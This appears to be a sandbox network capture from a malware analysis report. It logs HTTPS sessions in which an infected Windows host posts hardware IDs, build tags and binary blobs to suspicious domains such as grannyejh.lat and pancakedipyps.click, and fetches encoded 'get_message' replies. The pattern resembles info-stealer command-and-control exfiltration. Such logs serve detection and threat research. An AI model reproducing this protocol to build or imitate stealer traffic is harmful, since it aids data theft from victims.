Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	50381	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:20 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6JS2K8KHJB2KG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15075 Host: grannyejh.lat
2024-12-19 09:14:20 UTC	15075	OUT	Data Raw: 2d 2d 36 4a 53 32 4b 38 4b 48 4a 42 32 4b 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 4a 53 32 4b 38 4b 48 4a 42 32 4b 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4a 53 32 4b 38 4b 48 4a 42 32 4b 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 36 4a 53 32 4b 38 4b 48 4a 42 32 Data Ascii: --6JS2K8KHJB2KGContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--6JS2K8KHJB2KGContent-Disposition: form-data; name="pid"2--6JS2K8KHJB2KGContent-Disposition: form-data; name="lid"PsFKDg--pablo--6JS2K8KHJB2
2024-12-19 09:14:34 UTC	1128	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dc3cf109r1j0j2dpfhat3ac4p3; expires=Mon, 14 Apr 2025 03:01:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FVAmRa2xok7AXNGHCulfOAGhgEKszreiaDu4UausAFLIL9S4qBg35OS4PhY%2BBOA0W2%2B0RSMbamqYVl%2Bkgr7Wk%2BparVbSMntuGXcy1fUWnaLmEwo4Rx4RJAR6JCpNx4mJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4648263f9d4319-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2660&min_rtt=2601&rtt_var=1018&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2829&recv_bytes=16007&delivery_rate=1122645&cwnd=233&unsent_bytes=0&cid=d4081dada93dc98f&ts=14542&x=0"
2024-12-19 09:14:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.6	50383	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:21 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KRQDHKKRQFXD6X7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29554 Host: grannyejh.lat
2024-12-19 09:14:21 UTC	15331	OUT	Data Raw: 2d 2d 4b 52 51 44 48 4b 4b 52 51 46 58 44 36 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 52 51 44 48 4b 4b 52 51 46 58 44 36 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 52 51 44 48 4b 4b 52 51 46 58 44 36 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 52 51 44 48 Data Ascii: --KRQDHKKRQFXD6X7Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--KRQDHKKRQFXD6X7Content-Disposition: form-data; name="pid"1--KRQDHKKRQFXD6X7Content-Disposition: form-data; name="lid"PsFKDg--pablo--KRQDH
2024-12-19 09:14:21 UTC	14223	OUT	Data Raw: 1a 87 f0 c2 a0 61 e1 bb b5 85 a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 Data Ascii: anZo73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd0
2024-12-19 09:14:36 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7d77mbo8mfklg88ag1bkm8nnhq; expires=Mon, 14 Apr 2025 03:01:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FBs9LjWYQiuqM7UxLTXZYtah3vTLfVb2PeK336nNWwXseKxBpc8Fo8aH1akv7i9L7Wkt%2FCqWzITph%2FBwNug6oxcGPJFVL1vBWMR%2F39LCYFwUJMGqFeM0%2FKfmLEBKjRGj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46482ca8ad8c83-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1822&rtt_var=690&sent=21&recv=34&lost=0&retrans=0&sent_bytes=2830&recv_bytes=30532&delivery_rate=1577525&cwnd=189&unsent_bytes=0&cid=1408e908ad431157&ts=14673&x=0"
2024-12-19 09:14:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.6	50386	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:28 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HTOPUM8A9HPY7L93S User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19956 Host: pancakedipyps.click
2024-12-19 09:14:28 UTC	15331	OUT	Data Raw: 2d 2d 48 54 4f 50 55 4d 38 41 39 48 50 59 37 4c 39 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 54 4f 50 55 4d 38 41 39 48 50 59 37 4c 39 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 54 4f 50 55 4d 38 41 39 48 50 59 37 4c 39 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d Data Ascii: --HTOPUM8A9HPY7L93SContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--HTOPUM8A9HPY7L93SContent-Disposition: form-data; name="pid"3--HTOPUM8A9HPY7L93SContent-Disposition: form-data; name="lid"FATE99--test--
2024-12-19 09:14:28 UTC	4625	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f Data Ascii: +?2+?2+?o?Mp5p_o
2024-12-19 09:14:41 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t8m7j6gdqk3atltrvt3sksn88q; expires=Mon, 14 Apr 2025 03:01:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pVBchdPsXAgNAAxSEnB37Y%2BDr0b0ERffLB6vpgt78IYyjSCZO8n88wZnsOXTKvce34GUG6thjpXA1d1s5yJtZspX1%2F6FoIaEDbChZ1ZNfUzWnsdTKUkbNe7c%2FjvbMQr0rdkaCxK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464856ed7f4288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1660&rtt_var=635&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2848&recv_bytes=20920&delivery_rate=1706604&cwnd=245&unsent_bytes=0&cid=0b2846f258862644&ts=13857&x=0"
2024-12-19 09:14:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.6	50387	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:30 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: aspecteirs.lat
2024-12-19 09:14:30 UTC	85	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=CVmr0t--installs&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:14:43 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lrlekdmtar25h2gkluk74cnsmv; expires=Mon, 14 Apr 2025 03:01:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8VhW36wwftZaLZPy83u%2FLlLnfpTZ4%2FMLSbcYlCoQCvRzbpLkcxoQG7J02fwHjn8PZOC3U48YStkVJkhs%2FgKEO1rnMCNymGgQ5kJugTAgPa0Nn2gDHQnVOIsN6fNANpSPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4648638c394379-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2041&rtt_var=778&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=983&delivery_rate=1395126&cwnd=194&unsent_bytes=0&cid=314d57f40384e55d&ts=13713&x=0"
2024-12-19 09:14:43 UTC	54	IN	Data Raw: 33 30 0d 0a 70 46 58 50 4f 73 35 66 70 4c 4f 38 4e 51 31 4a 55 36 51 68 6b 38 79 64 35 48 78 6f 77 62 51 69 35 56 52 6c 46 71 45 37 33 6e 72 2f 43 41 3d 3d 0d 0a Data Ascii: 30pFXPOs5fpLO8NQ1JU6Qhk8yd5HxowbQi5VRlFqE73nr/CA==
2024-12-19 09:14:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	50391	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:36 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9VOPJZG4USB20PTPP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19957 Host: grannyejh.lat
2024-12-19 09:14:36 UTC	15331	OUT	Data Raw: 2d 2d 39 56 4f 50 4a 5a 47 34 55 53 42 32 30 50 54 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 56 4f 50 4a 5a 47 34 55 53 42 32 30 50 54 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 56 4f 50 4a 5a 47 34 55 53 42 32 30 50 54 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d Data Ascii: --9VOPJZG4USB20PTPPContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--9VOPJZG4USB20PTPPContent-Disposition: form-data; name="pid"3--9VOPJZG4USB20PTPPContent-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-19 09:14:36 UTC	4626	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-12-19 09:14:50 UTC	1119	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7gvrebt54iq6eg2al6m5pa75ns; expires=Mon, 14 Apr 2025 03:01:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N987DKqmgIwekFweVcwCjaHbVRWgeO8YhtAgcxSrQgH3bRrfDG9SYmvoJBorDE96nBmFdB1b9ZfvoODLT1nU46bOhyu80ogD6rrsMY5I%2FaK4oPZEzp1E2uefRGsHUCGR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4648890c87422b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1577&rtt_var=595&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2830&recv_bytes=20915&delivery_rate=1833019&cwnd=220&unsent_bytes=0&cid=25d4678deb650adb&ts=14433&x=0"
2024-12-19 09:14:50 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	50393	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:37 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: grannyejh.lat
2024-12-19 09:14:37 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:14:51 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ru40ik5uo760f2l4gfi2dp83vq; expires=Mon, 14 Apr 2025 03:01:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2B%2FVypGoeIPKiwYxhuo%2BvX2xbbaIXf5vYmvQykwt206P5%2BXgv%2FX40GwwnIZfbVDQsZpMOL5wucjOWyTZccAAho3SDy3HQoxneAj7V51IPj%2BjiVJcq6EFX7U3fZamYkQQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464890aee78ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1792&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=979&delivery_rate=1594756&cwnd=206&unsent_bytes=0&cid=cfb7180e12e935f5&ts=14695&x=0"
2024-12-19 09:14:51 UTC	214	IN	Data Raw: 64 30 0d 0a 74 32 61 4f 42 5a 64 68 38 56 76 6d 47 38 52 72 72 35 6d 65 45 77 6c 47 31 46 39 62 46 7a 75 79 73 59 6f 76 34 4c 30 79 4f 2b 2f 73 48 61 78 77 74 56 76 54 4d 35 4a 76 74 46 48 7a 74 73 49 38 4f 48 37 68 63 57 6b 6d 44 70 79 41 75 78 7a 4f 6a 41 52 6e 77 4e 67 41 36 46 6d 34 42 5a 51 39 79 48 36 38 44 6f 32 31 76 48 56 39 5a 4f 35 76 64 7a 56 65 6b 49 75 36 55 73 7a 47 45 45 37 4e 6a 55 54 6d 63 65 4d 52 79 77 66 4a 52 2b 74 61 6c 36 79 77 49 54 68 7a 2b 6d 35 71 4a 42 57 44 68 39 59 41 6b 38 6c 58 57 6f 4c 72 53 66 78 6b 2b 51 57 65 4e 73 68 2b 76 41 36 4e 74 62 78 31 66 57 54 75 62 33 63 31 58 70 43 4c 75 6c 4b 39 0d 0a Data Ascii: d0t2aOBZdh8VvmG8Rrr5meEwlG1F9bFzuysYov4L0yO+/sHaxwtVvTM5JvtFHztsI8OH7hcWkmDpyAuxzOjARnwNgA6Fm4BZQ9yH68Do21vHV9ZO5vdzVekIu6UszGEE7NjUTmceMRywfJR+tal6ywIThz+m5qJBWDh9YAk8lXWoLrSfxk+QWeNsh+vA6Ntbx1fWTub3c1XpCLulK9
2024-12-19 09:14:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.6	50395	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:43 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E3C14TT0M6IDFIB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1271 Host: pancakedipyps.click
2024-12-19 09:14:43 UTC	1271	OUT	Data Raw: 2d 2d 45 33 43 31 34 54 54 30 4d 36 49 44 46 49 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 33 43 31 34 54 54 30 4d 36 49 44 46 49 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 33 43 31 34 54 54 30 4d 36 49 44 46 49 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 45 33 43 31 34 54 Data Ascii: --E3C14TT0M6IDFIBContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--E3C14TT0M6IDFIBContent-Disposition: form-data; name="pid"1--E3C14TT0M6IDFIBContent-Disposition: form-data; name="lid"FATE99--test--E3C14T
2024-12-19 09:14:57 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v03mu2bafspovdrd183dcq50jl; expires=Mon, 14 Apr 2025 03:01:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQXnw1w0Sp4eAghoBniKako0%2BRqTZQONKq%2BQEWytcuoqjPJncCQ9opOWs%2BNuyDPpalADUeQo3SPpF8WmlcnVFZZRf%2Fg0UTolE%2Fs2mCHbQMub13UbuAbhVVzKo%2BhwvHS5iQ8vFckI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4648b5fb33f3bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1452&rtt_var=561&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=2188&delivery_rate=1921052&cwnd=80&unsent_bytes=0&cid=894e5b7704dfae55&ts=14120&x=0"
2024-12-19 09:14:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

